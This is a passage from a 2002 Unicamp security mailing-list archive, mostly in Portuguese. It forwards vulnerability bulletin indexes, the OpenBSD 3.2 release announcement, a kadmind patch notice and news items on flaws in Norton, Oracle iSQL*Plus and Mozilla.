From daniela em ccuec.unicamp.br Mon Nov 4 08:38:24 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Mon, 4 Nov 2002 08:38:24 -0200 Subject: [SECURITY-L] Vulnerabilidades de seguranca Message-ID: <20021104103824.GA271@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 30/10/2002 ---------- Gentoo Linux Security Announcement (200210-012) Assunto: vulnerabilidade de seguranca no pacote sharutils. http://www.security.unicamp.br/docs/bugs/2002/10/v125.txt Debian Security Advisory (DSA 184-1) Assunto: vulnerabilidade de seguranca no pacote krb4. http://www.security.unicamp.br/docs/bugs/2002/10/v126.txt Gentoo Linux Security Announcement (200210-013) Assunto: vulnerabilidade de seguranca no pacote pam_ldap. http://www.security.unicamp.br/docs/bugs/2002/10/v127.txt Anúncio de segurança do Conectiva Linux (CLA-2002:539) Assunto: Vazamento de memória no ypserv. http://www.security.unicamp.br/docs/bugs/2002/10/v128.txt Anúncio de segurança do Conectiva Linux (CLA-2002:540) Assunto: Vulnerabilidade remota de formatação de strings no pacote heartbeat. http://www.security.unicamp.br/docs/bugs/2002/10/v129.txt Anúncio de segurança do Conectiva Linux (CLA-2002:541) Assunto: Vulnerabilidade de cross site scripting no módulo mod_ssl. http://www.security.unicamp.br/docs/bugs/2002/10/v130.txt Microsoft Security Bulletin (MS02-064) Assunto: Windows 2000 Default Permissions Could Allow Trojan Horse Program (Q327522). http://www.security.unicamp.br/docs/bugs/2002/10/v131.txt Microsoft Security Bulletin (MS02-062) Assunto: Cumulative Patch for Internet Information Service (Q327696). http://www.security.unicamp.br/docs/bugs/2002/10/v132.txt Microsoft Security Bulletin (MS02-063) Assunto: Unchecked Buffer in PPTP Implementation Could Enable Denial of Service Attacks (Q329834). http://www.security.unicamp.br/docs/bugs/2002/10/v133.txt 31/10/2002: ----------- SuSE Security Announcement (SuSE-SA:2002:039) Assunto: vulnerabilidade de seguranca no pacote syslog-ng. http://www.security.unicamp.br/docs/bugs/2002/10/v134.txt Debian Security Advisory (DSA 185-1) Assunto: vulnerabilidade de seguranca no pacote heimdal. http://www.security.unicamp.br/docs/bugs/2002/10/v135.txt SuSE Security Announcement (SuSE-SA:2002:040) Assunto: vulnerabilidades de seguranca nos pacotes lprng, html2ps. http://www.security.unicamp.br/docs/bugs/2002/10/v136.txt CAIS-Alerta Assunto: Patch Acumulativo para o IIS (Q327696). http://www.security.unicamp.br/docs/bugs/2002/10/v137.txt CAIS-Alerta Assunto: Vulnerabilidade no PPTP do Microsoft Windows 2000 e XP (Q329834). http://www.security.unicamp.br/docs/bugs/2002/10/v138.txt -- Equipe de Seguranca em Sitemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Tue Nov 5 14:30:30 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Tue, 5 Nov 2002 14:30:30 -0200 Subject: [SECURITY-L] OpenBSD 3.2 Released Message-ID: <20021105163030.GA3003@ccuec.unicamp.br> ----- Forwarded message from Klaus Steding-Jessen ----- From: Klaus Steding-Jessen Subject: [S] [Todd.Miller em courtesan.com: OpenBSD 3.2 Released] To: seguranca em pangeia.com.br Date: Fri, 1 Nov 2002 14:52:38 -0300 ----- Forwarded message from "Todd C. Miller" ----- To: announce em openbsd.org Subject: OpenBSD 3.2 Released Date: Fri, 01 Nov 2002 09:23:40 -0700 From: "Todd C. Miller" X-Loop: announce em openbsd.org Precedence: list ------------------------------------------------------------------------ - OpenBSD 3.2 RELEASED ------------------------------------------------- Nov 1, 2002. It is our pleasure to officially announce the release of OpenBSD 3.2. This is our 12th release on CD-ROM (and 13th via FTP). We remain proud of OpenBSD's record of six years with only a single remote hole in the default install. As in our previous releases, 3.2 provides significant improvements, including new features, in nearly all areas of the system: - Improved hardware support (http://www.OpenBSD.org/plat.html) o Asymmetric and symmetric hardware encryption support is enabled by default if a supported crypto accelerator is present. o Improved frame buffer and X Window System performance on the sparc, sparc64, and alpha platforms. o Builtin AGP-based video on i386 machines using ALI, AMD, Intel, SiS, and VIA chipsets is now supported and usable by the X Window System. o Intel Gigabit Ethernet adapters are now supported by the em(4) driver which replaces the gx(4) driver. The em(4) driver supports more models and has better performance than the old gx(4) driver. o Fixed a stability problem with the twe(4) driver and some UDMA drives. o Added support for more PCI-based Cyclades serial boards. o IDE disks larger than 128GB and UDMA133 are now supported. o Updated isp(4) and siop(4) SCSI drivers. o Added support for sbus-PCMCIA bridges on the sparc64 platform. o The wi(4) driver (Wavelan, Prism, and Symbol 802.11b) now works on the sparc64 platform. o DMA handling in the hme(4) driver has been fixed. - Major improvements in the pf packet filter, including: o New "antispoof" keyword: spoofing protection made easy. o Much simplified filter rule language. o Extended filtering capabilities. o All known bugs with filtering bridged interfaces have been fixed. o It is now possible to control state table entries with a per-rule granularity. o Support for dynamic interface expansion. There is no longer a need to reload the ruleset due to IP address changes. This is useful for interfaces where the address is dynamically assigned (PPP and DHCP). - Ever-improving security (http://www.OpenBSD.org/security.html) o Non-executable stack on i386, sparc (sun4m only), sparc64, alpha, and macppc platforms. Non-executable data and bss on sparc (sun4m only), sparc64 and alpha. This makes the system more resistent to buffer overflow attacks. o OpenBSD 3.2 ships with fewer setuid root binaries than ever before. Many of the remaining root setuid binaries drop root privileges early in their execution. The use of setuid in the ports subsystem has also been reduced. o Privilege separation is now the default in sshd. o The Apache web server now runs in a chroot jail by default. The new "-u" option can be used to disable this. o Several other security issues fixed throughout the system, many of which were identified by members of the OpenBSD team themselves. Please see http://www.OpenBSD.org/errata31.html for more details on what was fixed. - New subsystems included with 3.2 o A new tool, systrace, enables the user to specify policy for an executable at the system call level. o The sparc platform now uses ELF binaries. - Many other bugs fixed (http://www.OpenBSD.org/plus32.html) - The "ports" tree is greatly improved (http://www.OpenBSD.org/ports.html) o The 3.2 CD-ROMs ship with many pre-built packages for the common architectures. The FTP site contains hundreds more packages (for the important architectures) which we could not fit onto the CD-ROMs (or which had prohibitive licenses). - Many subsystems improved and updated since the last release: o XFree86 updated to 4.2.1. o Sendmail updated to 8.12.6. o Apache 1.3.26 and mod_ssl 2.8.10. o OpenSSL 0.9.7beta3 (+ patches) o Latest KAME IPv6 o OpenSSH 3.5 o The atrun command has been incorporated into the cron(8) daemon. o The vlan(4) driver now supports multicast. If you'd like to see a list of what has changed between OpenBSD 3.1 and 3.2, look at http://www.OpenBSD.org/plus32.html Even though the list is a summary of the most important changes made to OpenBSD, it still is a very very long list. This is our thirteenth OpenBSD release, and the twelfth release which is available on CD-ROM. Our releases have been spaced six months apart, and we plan to continue this timing. ------------------------------------------------------------------------ - SECURITY AND ERRATA -------------------------------------------------- We provide patches for known security threats and other important issues discovered after each CD release. As usual, between the creation of the OpenBSD 3.2 FTP/CD-ROM binaries and the actual 3.2 release date, our team found and fixed some new reliability problems (note: most are minor, and in subsystems that are not enabled by default). Our continued research into security means we will find new security problems -- and we always provide patches as soon as possible. Therefore, we advise regular visits to http://www.OpenBSD.org/security.html and http://www.OpenBSD.org/errata.html Security patch announcements are sent to the security-announce em OpenBSD.org mailing list. For information on OpenBSD mailing lists, please see: http://www.OpenBSD.org/mail.html ------------------------------------------------------------------------ - CD-ROM SALES ---------------------------------------------------------- OpenBSD 3.2 is also available on CD-ROM. The 3-CD set costs $40USD (EUR 45) and is available via mail order and from a number of contacts around the world. The set includes a colorful booklet which carefully explains the installation of OpenBSD. A new set of cute little stickers are also included (sorry, but our FTP mirror sites do not support STP, the Sticker Transfer Protocol). As an added bonus, the second CD contains an exclusive audio track, "Goldflipper". Lyrics for the song may be found at: http://www.OpenBSD.org/lyrics.html#32 Profits from CD sales are the primary income source for the OpenBSD project -- in essence selling these CD-ROM units ensures that OpenBSD will continue to make another release six months from now. The OpenBSD 3.2 CD-ROMs are bootable on the following six platforms: o i386 o alpha o sparc o sparc64 (UltraSPARC) o macppc o hp300* * The m68k-based platforms, including hp300, are located on a fourth CD that is not included in the official CD-ROM package. You can download the ISO-9660 image for the fourth CD as described below. (Other platforms must boot from floppy, network, or other method). For more information on ordering CD-ROMs, see: http://www.OpenBSD.org/orders.html The above web page lists a number of places where OpenBSD CD-ROMs can be purchased from. For our default mail order, go directly to: https://https.OpenBSD.org/cgi-bin/order or, for European orders: https://https.OpenBSD.org/cgi-bin/order.eu All of our developers strongly urge you to buy a CD-ROM and support our future efforts. As well, donations to the project are highly appreciated, as described in more detail at: http://www.OpenBSD.org/goals.html#funding Due to space restrictions and our desire not to raise the cost of the CD-ROM, the Motorola 68k-based platforms are located on a fourth CD that is not included in the official CD-ROM package. An ISO-9660 image for this CD may be downloaded from: ftp://ftp.OpenBSD.org/pub/OpenBSD-ISO/3.2-CD4.iso This CD contains the amiga, hp300, mac68k and mvme68k install sets as well as the m68k packages. The CD is bootable on the hp300. Note that not all ftp mirrors will carry the CD image. ------------------------------------------------------------------------ - T-SHIRT SALES -------------------------------------------------------- The project continues to expand its funding base by selling t-shirts and polo shirts. And our users like them too. We have a variety of shirts available, with the new and old designs, from our web ordering system at: https://https.OpenBSD.org/cgi-bin/order The new 3.2 t-shirt is not available at this time but will be available shortly. ------------------------------------------------------------------------ - FTP INSTALLS --------------------------------------------------------- If you choose not to buy an OpenBSD CD-ROM, OpenBSD can be easily installed via FTP. Typically you need a single small piece of boot media (e.g., a boot floppy) and then the rest of the files can be installed from a number of locations, including directly off the Internet. Follow this simple set of instructions to ensure that you find all of the documentation you will need while performing an install via FTP. With the CD-ROMs, the necessary documentation is easier to find. 1) Read either of the following two files for a list of ftp mirrors which provide OpenBSD, then choose one near you: http://www.OpenBSD.org/ftp.html ftp://ftp.OpenBSD.org/pub/OpenBSD/3.2/ftplist As of Nov 1, 2002, the following ftp sites have the 3.2 release: ftp://ftp.ca.openbsd.org/pub/OpenBSD/3.2/ Alberta, Canada ftp://ftp.usa.openbsd.org/pub/OpenBSD/3.2/ Boulder, CO, USA ftp://ftp.se.openbsd.org/pub/OpenBSD/3.2/ Stockholm, Sweden ftp://ftp.calyx.nl/pub/OpenBSD/3.2/ Amsterdam, Netherlands ftp://ftp.wiretapped.net/pub/OpenBSD/3.2/ Sydney, Australia Other mirrors will take a day or two to update. 2) Connect to that ftp mirror site and go into the directory pub/OpenBSD/3.2/ which contains these files and directories. This is a list of what you will see: ANNOUNCEMENT XF4.tar.gz mac68k/ sparc/ Changelogs/ alpha/ macppc/ sparc64/ HARDWARE amiga/ mvme68k/ src.tar.gz PACKAGES ftplist packages/ srcsys.tar.gz PORTS hp300/ ports.tar.gz tools/ README i386/ root.mail vax/ It is quite likely that you will want at LEAST the following files which apply to all the architectures OpenBSD supports. README - generic README HARDWARE - list of hardware we support PORTS - description of our "ports" tree PACKAGES - description of pre-compiled packages root.mail - a copy of root's mail at initial login. (This is really worthwhile reading). 3) Read the README file. It is short, and a quick read will make sure you understand what else you need to fetch. 4) Next, go into the directory that applies to your architecture, for example, i386. This is a list of what you will see: CKSUM INSTALL.os2br comp32.tgz man32.tgz INSTALL.ata INSTALL.pt etc32.tgz misc32.tgz INSTALL.chs MD5 floppy32.fs xbase32.tgz INSTALL.dbr base32.tgz floppyB32.fs xfont32.tgz INSTALL.i386 bsd floppyC32.fs xserv32.tgz INSTALL.linux bsd.rd game32.tgz xshare32.tgz INSTALL.mbr cdrom32.fs index.txt If you are new to OpenBSD, fetch _at least_ the file INSTALL.i386 and the appropriate floppy*.fs file. Consult the INSTALL.i386 file if you don't know which of the floppy images you need (or simply fetch all of them). 5) If you are an expert, follow the instructions in the file called README; otherwise, use the more complete instructions in the file called INSTALL.i386. INSTALL.i386 may tell you that you need to fetch other files. 6) Just in case, take a peek at: http://www.OpenBSD.org/errata.html This is the page where we talk about the mistakes we made while creating the 3.2 release, or the significant bugs we fixed post-release which we think our users should have fixes for. Patches and workarounds are clearly described there. Note: If you end up needing to write a raw floppy using Windows, you can use "fdimage.exe" located in the pub/OpenBSD/3.2/tools directory to do so. ------------------------------------------------------------------------ - XFree86 FOR MOST ARCHITECTURES --------------------------------------- XFree86 has been integrated more closely into the system. This release contains XFree86 4.2.1. Most of our architectures ship with XFree86, including sparc, sparc64 and macppc. During installation, you can install XFree86 quite easily. Be sure to try out xdm(1) and see how we have customized it for OpenBSD. On the i386 platform a few older X servers are included from XFree86 3.3.6. These can be used for cards that are not supported by XFree86 4.2.1 or where XFree86 4.2.1 support is buggy. Please read the /usr/X11R6/README file for post-installation information. ------------------------------------------------------------------------ - PORTS TREE ----------------------------------------------------------- The OpenBSD ports tree contains automated instructions for building third party software. The software has been verified to build and run on the various OpenBSD architectures. The 3.2 ports collection, including many of the distribution files, is included on the 3-CD set. Please see PORTS file for more information. Note: some of the most popular ports, e.g., the Apache web server and several X applications, come standard with OpenBSD. Also, many popular ports have been pre-compiled for those who do not desire to build their own binaries (see PACKAGES, below). ------------------------------------------------------------------------ - BINARY PACKAGES WE PROVIDE ------------------------------------------- A large number of binary packages are provided. Please see PACKAGES file (ftp://ftp.OpenBSD.org/pub/OpenBSD/PACKAGES) for more details. ------------------------------------------------------------------------ - SYSTEM SOURCE CODE --------------------------------------------------- The CD-ROMs contain source code for all the subsystems explained above, and the README (ftp://ftp.OpenBSD.org/pub/OpenBSD/README) file explains how to deal with these source files. For those who are doing an FTP install, the source code for all four subsystems can be found in the pub/OpenBSD/3.2/ directory: XF4.tar.gz ports.tar.gz src.tar.gz srcsys.tar.gz ------------------------------------------------------------------------ - THANKS --------------------------------------------------------------- OpenBSD 3.2 includes artwork and CD artistic layout by Ty Semaka, who also wrote the lyrics and arranged an audio track on the OpenBSD 3.2 CD set. Ports tree and package building by Christian Weisgerber, David Lebel, Peter Valchev and Miod Vallat. System builds by Theo de Raadt, Niklas Hallqvist, Todd Fries and Bob Beck. ISO-9660 filesystem layout by Theo de Raadt. We would like to thank all of the people who sent in bug reports, bug fixes, donation cheques, and hardware that we use. We would also like to thank those who pre-ordered the 3.2 CD-ROM or bought our previous CD-ROMs. Those who did not support us financially have still helped us with our goal of improving the quality of the software. Our developers are: Aaron Campbell, Angelos D. Keromytis, Anil Madhavapeddy, Artur Grabowski, Ben Lindstrom, Bjorn Sandell, Bob Beck, Brad Smith, Brandon Creighton, Brian Caswell, Brian Somers, Bruno Rohee, Camiel Dobbelaar, Chad Loder, Chris Cappuccio, Christian Weisgerber, Constantine Sapuntzakis, Dale Rahn, Damien Couderc, Damien Miller, Dan Harnett, Daniel Hartmeier, David B Terrell, David Lebel, David Leonard, Dug Song, Eric Jackson, Federico G. Schwindt, Grigoriy Orlov, Hakan Olsson, Hans Insulander, Heikki Korpela, Henning Brauer, Henric Jungheim, Horacio Menezo Ganau, Hugh Graham, Ian Darwin, Jakob Schlyter, Jan-Uwe Finck, Jason Ish, Jason Peel, Jason Wright, Jean-Baptiste Marchand, Jean-Jacques Bernard-Gundol, Jim Rees, Joshua Stein, Jun-ichiro itojun Hagino, Kenjiro Cho, Kenneth R Westerback, Kevin Lo, Kevin Steves, Kjell Wooding, Louis Bertrand, Marc Espie, Marc Matteo, Marco S Hyman, Marcus Watts, Mark Grimes, Markus Friedl, Mats O Jansson, Matt Behrens, Matt Smart, Matthew Jacob, Matthieu Herrb, Michael Shalayeff, Michael T. Stolarchuk, Mike Frantzen, Mike Pechkin, Miod Vallat, Nathan Binkert, Nick Holland, Niels Provos, Niklas Hallqvist, Nils Nordman, Oleg Safiullin, Paul Janzen, Peter Galbavy, Peter Stromberg, Peter Valchev, Philipp Buehler, Reinhard J. Sammer, Ryan Thomas McBride, Shell Hin-lik Hung, Steve Murphree, Theo de Raadt, Thierry Deval, Thomas Nordin, Thorsten Lockert, Tobias Weingartner, Todd C. Miller, Todd T. Fries, Vincent Labrecque, Wilbern Cobb, Wim Vandeputte. ----- End forwarded message ----- From daniela em ccuec.unicamp.br Tue Nov 5 14:31:53 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Tue, 5 Nov 2002 14:31:53 -0200 Subject: [SECURITY-L] Bug em software de seguranca apaga e-mails sem explicacao Message-ID: <20021105163153.GB3003@ccuec.unicamp.br> ----- Forwarded message from Caio Souza Mendes ----- From: Caio Souza Mendes Subject: Bug em software de seguranXa apaga e-mails sem explicaXXo To: daniela em ccuec.unicamp.br Date: Mon, 4 Nov 2002 16:26:30 -0300 (ART) 04/11/2002 - 16h37 Bug em software de segurança apaga e-mails sem explicação da Folha Online Um sério bug no Norton Internet Security 2003 foi responsável por uma série de e-mails apagados sem explicação. Segundo o site de notícias The Register, a Symantec está sabendo do problema com a última versão de sua suíte de segurança e já está arrumando a falha. A Symantec garantiu que entrega o arquivo de correção através da ferramenta automática de atualização LiveUpdate ainda esta semana. A empresa reduziu o grau de significância do problema ao alegar que o produto ainda tem um número muito pequeno de usuários. Um porta-voz da empresa disse que "o software está trabalhando como esperado para a maioria dos clientes". Para os "poucos" afetados pelo problema, as consequências são sérias, disse uma das vítimas. "As pessoas estão tendo seus e-mails apagados permanentemente por um produto que deveria, na verdade, dar segurança ao sistema." Depois de utilizar uma recurso (mailwasher) para remover spams (e-mails indesejados) de sua caixa de mensagens, ao abrir seu Outlook XP, o usuário deparou-se com uma série de e-mails idênticos com o seguinte conteúdo: "O Symantec Email Proxy apagou as seguintes mensagens". Esse tipo de falha é raro, mas não sem precedentes. No ano passado, o software VirusScan, da McAfee, também fazia com que os e-mails enviados para o Outlook Express desaparecessem. Na ocasião, a McAfee consertou o problema, mas foi criticada pela demora em fazê-lo. No caso do bug no Norton, segundo o usuário afetado pelo problema, ele foi reportado para a fabricante pela primeira vez no dia 14 de outubro. Fonte: Folha Online - http://www1.uol.com.br/folha/informatica/ult124u11479.shtml ----- End forwarded message ----- From daniela em ccuec.unicamp.br Tue Nov 5 14:33:47 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Tue, 5 Nov 2002 14:33:47 -0200 Subject: [SECURITY-L] Descoberta uma grave falha no Oracle iSQL*Plus Message-ID: <20021105163347.GC3003@ccuec.unicamp.br> ----- Forwarded message from Caio Souza Mendes ----- From: Caio Souza Mendes Subject: Descoberta uma grave falha no Oracle iSQL*Plus To: daniela em ccuec.unicamp.br Date: Mon, 4 Nov 2002 17:27:05 -0300 (ART) Notícia :: Descoberta uma grave falha no Oracle iSQL*Plus :: 04/11/2002 @ 17:23:41 Foi descoberta uma grave falha no Oracle9i Database no qual pode permitir um atacante executar comandos remotamente no servidor, podendo comprometer as informações na base de dados e até mesmo o sistema por completo. O problema se encontra através do logon remoto no Oracle iSQL*PLUS, que é acessado pela url /isqlplus, onde é necessário o usuário se logar. Através de um buffer não verificado (buffer overflow) no parâmetro de ID do usuário, é possível para um atacante executar comandos remotamente no servidor através da conta 'oracle', utilizado na maioria dos sistemas, ou através do usuário SYSTEM em sistemas Windows. A Oracle já disponibilizou a correção para este problema, sendo que a vulnerabilidade afeta o Oracle9i Database, Release 1, Release 9.0.x (Todas versões) e o Oracle9i Database, Release 2, Releases 9.2.0.1 and 9.2.0.2. Maiores informações podem ser obtidas através do endereço abaixo. [Oracle Security Alert #46] http://otn.oracle.com/deploy/security/pdf/2002alert46rev1.pdf Fonte: Telsinc Security - http://www.telsincsecurity.com.br/?menu=noticia¬id=254 ----- End forwarded message ----- From daniela em ccuec.unicamp.br Tue Nov 5 14:40:43 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Tue, 5 Nov 2002 14:40:43 -0200 Subject: [SECURITY-L] OpenBSD 3.2 patch 001 released Message-ID: <20021105164043.GE3003@ccuec.unicamp.br> ----- Forwarded message from Miod Vallat ----- From: Miod Vallat Subject: [S] OpenBSD 3.2 patch 001 released To: security-announce em openbsd.org Date: Tue, 5 Nov 2002 15:39:09 +0000 OpenBSD 3.2, as shipped, is vulnerable to a kadmind remote exploit if the machine is configured as a kdc (which is not the case in the default install). A fix addressing this problem is available in the -STABLE branch, and as a standalone patch file, at the following location: ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.2/common/001_kadmin.patch For more information about errata and patch, please read the OpenBSD errata page: http://www.openbsd.org/errata.html ----- End forwarded message ----- From mieko em ccuec.unicamp.br Wed Nov 6 11:16:30 2002 From: mieko em ccuec.unicamp.br (Silvana Mieko Misuta) Date: Wed, 6 Nov 2002 11:16:30 -0200 Subject: [SECURITY-L] Boletins de Noticias Message-ID: <20021106131626.GA4374@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e redes da Unicamp com os seguintes boletins de noticias e/ou revistas eletronicas: 04/11/2002: ----------- SecurityFocus.com Newsletter #168 Fonte: SecurityFocus.com http://www.security.unicamp.br/docs/informativos/2002/11/b3.txt 04/11/2002: ----------- SANS Critical Vulnerability Analysis Vol. 1 Num. 15 Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2002/11/b2.txt 03/11/2002: ----------- LinuxSecurity Brasil Edicao Especial <03/11/02> Fonte: Linux Security http://www.security.unicamp.br/docs/informativos/2002/11/b1.html 30/10/2002: ----------- SANS NewsBites Vol. 4 Num. 44 Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2002/10/b13.txt Modulo Security News no. 267 Fonte: Modulo Security Solutions S/A http://www.security.unicamp.br/docs/informativos/2002/10/b14.txt 28/10/2002: ----------- SANS Critical Vulnerability Analysis Vol. 1 Num. 14 Fonte: SANS Institute http://www.security.unicamp.br/docs/informativos/2002/10/b16.txt SecurityFocus.com Newsletter #168 Fonte: SecurityFocus.com http://www.security.unicamp.br/docs/informativos/2002/10/b12.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Wed Nov 6 14:20:00 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Wed, 6 Nov 2002 14:20:00 -0200 Subject: [SECURITY-L] Banco americano divulga e-mail dos clientes Message-ID: <20021106161957.GA4574@ccuec.unicamp.br> ----- Forwarded message from Nelson Murilo ----- From: Nelson Murilo Subject: [S] Banco americano divulga e-mail dos clientes To: seguranca em pangeia.com.br Date: Wed, 6 Nov 2002 12:22:00 -0200 [http://www2.uol.com.br/info/aberto/infonews/112002/06112002-5.shl] Banco americano divulga e-mail dos clientes Quarta-feira, 06 de novembro de 2002 - 11h11 SÃO PAULO - Uma falha aparentemente humana - e bastante comum, diga-se de passagem - fez com que Bank of the West, de São Francisco, divulgasse o endereço eletrônico de milhares de clientes. Um prato cheio para os spammers de plantão. Segundo o jornal The Mercury News, ao mandar um comunicado sobre a interrupção temporária de serviços durante o último sábado, um funcionário responsável pelo envio colocou todos os 3 500 endereços selecionados, abertos, no campo "Para". Alguns clientes, revoltados, já avisaram que cancelarão suas contas, duvidando da capacidade do banco de manter suas informações confidenciais à salvo. É que a questão da privacidade é muito discutida nos Estados Unidos, e endereços de e-mail devem ser preservados, segundo a legislação de vários estados. O porta-voz do banco, John Stafford, pediu desculpas puplicamente pelo episódio e declarou que o banco está tomando providências para melhorar a proteção de suas ferramentas tecnológicas. Garantiu, também, que o banco é muito cuidadoso na proteção dos dados financeiros dos clientes. O grupo de defesa da privacidade da Filadélfia disse que saber onde uma pessoa possui conta bancária não é de todo perigoso, mas já é meio passo andado caso uma pessoa esteja realmente disposta a roubar a identificação de outra pessoa. Além do risco de perder clientes, o Bank of the West ainda corre o risco de ter que enfrentar problemas na justiça por causa de sua "indiscrição". Foi o que aconteceu com a Eli Lilly, que revelou acidentalmente, no ano passado, o nome e o endereço de e-mail de 669 usuários do antidepressivo Prozac. A companhia farmacêutica foi multada e terá suas práticas de marketing fiscalizadas pela Comissão Federal de Comércio durante os próximos 20 anos. Renata Mesquita, do Plantão INFO ----- End forwarded message ----- From daniela em ccuec.unicamp.br Thu Nov 7 10:02:46 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Thu, 7 Nov 2002 10:02:46 -0200 Subject: [SECURITY-L] Descobertas seis falhas no navegador Mozilla; atualize o soft Message-ID: <20021107120246.GB5844@ccuec.unicamp.br> ----- Forwarded message from Caio Souza Mendes ----- From: Caio Souza Mendes Subject: Descobertas seis falhas no navegador Mozilla; atualize o soft To: daniela em ccuec.unicamp.br Date: Wed, 6 Nov 2002 14:23:43 -0300 (ART) 06/11/2002 - 12h32 Descobertas seis falhas no navegador Mozilla; atualize o soft da Folha Online Seis novas falhas de segurança foram descobertas no navegador de código-fonte aberto Mozilla durante o fim de semana e publicadas por especialistas na lista BugTraq. Problemas nas versões anteriores à 1.0.1 podem ser usados por hackers para ter acesso ao disco rígido dos usuários, ler e apagar arquivos e até mesmo executar programas. As falhas começaram a ser apontadas em outubro. Durante o final de semana, no entanto, apareceram na lista de segurança BugTraq alguns alertas com a demonstração dos bugs. Um deles, por exemplo, está na transição entre sites seguros feita através de um site aberto. Segundo os alertas, o Mozilla não avisa o internauta sobre a mudança de um ambiente para o outro. Essa falha no redirecionamento entre os protocolos HTTP e HTTPS são sérias para sites de comércio eletrônico, e podem dar ao usuário do navegador uma falsa idéia de segurança. Outras falhas incluem problemas com o recurso XMLSerializer, com a interpretação de imagens GIF e com as funções "onkeypress" e "document.open()", além da função JavaScript "onUnload". É recomendável que o usuário atualize o navegador para a versão 1.2b, que chegou à internet no último dia 16 de outubro. O download é gratuito, e existem versões para Windows, Mac OS e Linux. E pode ser baixado no site: http://www.mozilla.org/releases/ Fonte: Folha Online - http://www1.uol.com.br/folha/informatica/ult124u11505.shtml ----- End forwarded message ----- From mieko em ccuec.unicamp.br Fri Nov 8 13:05:33 2002 From: mieko em ccuec.unicamp.br (Silvana Mieko Misuta) Date: Fri, 8 Nov 2002 13:05:33 -0200 Subject: [SECURITY-L] Vulnerabilidades de Seguranca Message-ID: <20021108150533.GA7816@ccuec.unicamp.br> Srs. Usuarios, Atualizamos o site da Equipe de Seguranca em Sistemas e Redes da Unicamp com os seguintes boletins de vulnerabilidades: 07/11/2002 ---------- Debian Security Advisory Assunto: vulnerabilidade de seguranca no pacote squirrelmail http://www.security.unicamp.br/docs/bugs/2002/11/v13.txt Red Hat Security Advisory Assunto: Updated kerberos packages available http://www.security.unicamp.br/docs/bugs/2002/11/v12.txt Debian Security Advisory Assunto: vulnerabilidade de seguranca no pacote wmaker http://www.security.unicamp.br/docs/bugs/2002/11/v11.txt 06/11/2002 ---------- SGI Security Advisory Assunto: IRIX ToolTalk rpc.ttdbserverd vulnerabilities http://www.security.unicamp.br/docs/bugs/2002/11/v10.txt CONECTIVA LINUX SECURITY ANNOUNCEMENT Assunto: vulnerabilidade de seguranca no linuxconf http://www.security.unicamp.br/docs/bugs/2002/11/v9.txt Debian Security Advisory (DSA 189-1) Assunto: vulnerabilidade de seguranca no pacote luxman http://www.security.unicamp.br/docs/bugs/2002/11/v8.txt GENTOO LINUX SECURITY ANNOUNCEMENT (200211-001) Assunto: vulnerabilidade de seguranca no pacote MailTools http://www.security.unicamp.br/docs/bugs/2002/11/v7.txt Red Hat Security Advisory (RHSA-2002:197-09) Assunto: Updated glibc packages fix vulnerabilities in resolver http://www.security.unicamp.br/docs/bugs/2002/11/v6.txt 05/11/2002 ---------- SGI Security Advisory (20021101-01-P) Assunto: CDE ToolTalk rpc.ttdbserverd vulnerabilities http://www.security.unicamp.br/docs/bugs/2002/11/v5.txt Debian Security Advisory (DSA 188-1) Assunto: vulnerabilidade de seguranca no apache-ssl http://www.security.unicamp.br/docs/bugs/2002/11/v4.txt SuSE Security Announcement (SuSE-SA:2002:041) Assunto: vulnerabilidade de seguranca no pacote perl-MailTools http://www.security.unicamp.br/docs/bugs/2002/11/v3.txt 04/11/2002 ---------- Debian Security Advisory (DSA 187-1) Assunto: vulnerabilidade de seguranca no apache http://www.security.unicamp.br/docs/bugs/2002/11/v2.txt 01/11/2002 ---------- Debian Security Advisory (DSA 186-1) Assunto: vulnerabilidade de seguranca no pacote log2mail http://www.security.unicamp.br/docs/bugs/2002/11/v1.txt 31/10/2002 ---------- An\xfancio de seguran\xe7a do Conectiva Linux (CLA-2002:543) Assunto: Problemas com última atualização http://www.security.unicamp.br/docs/bugs/2002/10/v144.txt Mandrake Linux Security Update Advisory Assunto: vulnerabilidade de seguranca no pacote mozilla http://www.security.unicamp.br/docs/bugs/2002/10/v143.txt Anúncio de segurança do Conectiva Linux (CLA-2002:542) Assunto: Buffer overflow vulnerability http://www.security.unicamp.br/docs/bugs/2002/10/v142.txt Cisco Security Advisory Assunto: Cisco ONS15454 and Cisco ONS15327 Vulnerabilities http://www.security.unicamp.br/docs/bugs/2002/10/v141.txt 29/10/2002 ---------- SCO Security Advisory (CSSA-2002-043.0) Assunto: chfn (util-linux) temp file race vulnerability http://www.security.unicamp.br/docs/bugs/2002/10/v140.txt Anúncio de segurança do Conectiva Linux (CLA-2002:535) Assunto: Fix for several vulnerabilities and daylight saving time for Brazil. http://www.security.unicamp.br/docs/bugs/2002/10/v139.txt -- Equipe de Seguranca em Sistemas e Redes Unicamp - Universidade Estadual de Campinas mailto:security em unicamp.br http://www.security.unicamp.br From daniela em ccuec.unicamp.br Tue Nov 12 16:31:06 2002 From: daniela em ccuec.unicamp.br (Daniela Regina Barbetti Silva) Date: Tue, 12 Nov 2002 16:31:06 -0200 Subject: [SECURITY-L] ISS Security Advisory: Multiple Remote Vulnerabilities in BIND4 and BIND8 Message-ID: <20021112183105.GC2882@ccuec.unicamp.br> ----- Forwarded message from Nelson Murilo ----- From: Nelson Murilo Subject: [S] ISS Security Advisory: Multiple Remote Vulnerabilities in BIND4 and BIND8 To: seguranca em pangeia.com.br Date: Tue, 12 Nov 2002 